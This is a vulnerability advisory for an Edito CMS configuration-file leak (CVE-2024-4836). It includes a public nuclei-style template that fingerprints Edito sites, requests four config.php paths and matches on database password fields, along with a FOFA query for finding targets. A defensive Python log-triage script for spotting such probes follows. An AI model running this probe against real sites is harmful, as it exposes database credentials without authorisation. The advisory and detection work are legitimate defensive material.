CVE-2024-4836: Edito CMS - Sensitive Data Leak

Date: 2025-08-01 | Affected software: Edito CMS | PoC: public

Vulnerability description

Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data because they allow an unauthorized user to download configuration files.

PoC code [public]

id: CVE-2024-4836

info:
  name: Edito CMS - Sensitive Data Leak
  author: s4e-io
  severity: high
  description: |
    Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.
  reference:
    - https://cert.pl/en/posts/2024/07/CVE-2024-4836/
    - https://github.com/sleep46/CVE-2024-4836_Check
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4836
  classification:
    epss-score: 0.36523
    epss-percentile: 0.9702
  metadata:
    max-request: 5
    fofa-query: icon_hash="1491301339"
  tags: cve,cve2024,cms,edito,info-leak

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body,"content=\"edito", "www.edito.pl")'
          - "status_code==200"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/config.php"
      - "{{BaseURL}}/config/config.php"
      - "{{BaseURL}}/include/config.php"
      - "{{BaseURL}}/includes/config.php"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"db_password", "db_username")'
          - "status_code==200"
        condition: and
# digest: 4a0a004730450221008900cb07c7dcbc22a7638c5c02b17238f50fa2083605a366d81a2e609f510de8022024694a96a824210f9d04c1e9a6fd0b9fba752afaa7968b405e06d7cd8cc991f3:922c64590222798bb761d5b6d8e72950
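
For defenders, the same four paths can be hunted in web server access logs. The following is an added example, not part of the template or of any Edito or nuclei code: it assumes Combined Log Format, the function names are hypothetical, and the sample log lines are constructed. A log holds no response body, so a 200 with a non-empty body is only a lead to confirm against the `db_password` / `db_username` strings the template matches on.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# The four paths requested by the template above (taken from the page).
CONFIG_PATHS = {"/config.php", "/config/config.php",
                "/include/config.php", "/includes/config.php"}

# Combined Log Format as written by default Apache/nginx setups (assumption).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

def normalize(target):
    """Strip the query string, percent-decode, collapse repeated slashes."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path)

def triage(lines):
    """Return (served, sweeps).
    served: (ip, path, size) for requests answered 200 with a non-empty body.
            An executed PHP config file normally prints nothing, so a body
            here needs a manual look (heuristic only).
    sweeps: {ip: sorted paths} for clients that tried 3+ of the paths,
            whatever the status: the trace a scanner run leaves behind.
    """
    served, tried = [], defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        path = normalize(m["target"])
        if path not in CONFIG_PATHS:
            continue
        tried[m["ip"]].add(path)
        size = 0 if m["size"] == "-" else int(m["size"])
        if m["status"] == "200" and size > 0:
            served.append((m["ip"], path, size))
    sweeps = {ip: sorted(p) for ip, p in tried.items() if len(p) >= 3}
    return served, sweeps

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /config.php HTTP/1.1" 404 153 "-" "-"',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "GET /config/config.php HTTP/1.1" 404 153 "-" "-"',
    '203.0.113.7 - - [01/Aug/2025:10:00:03 +0000] "GET /include/config.php HTTP/1.1" 200 842 "-" "-"',
    '198.51.100.20 - - [01/Aug/2025:11:30:00 +0000] "GET //includes/config.php?x=1 HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```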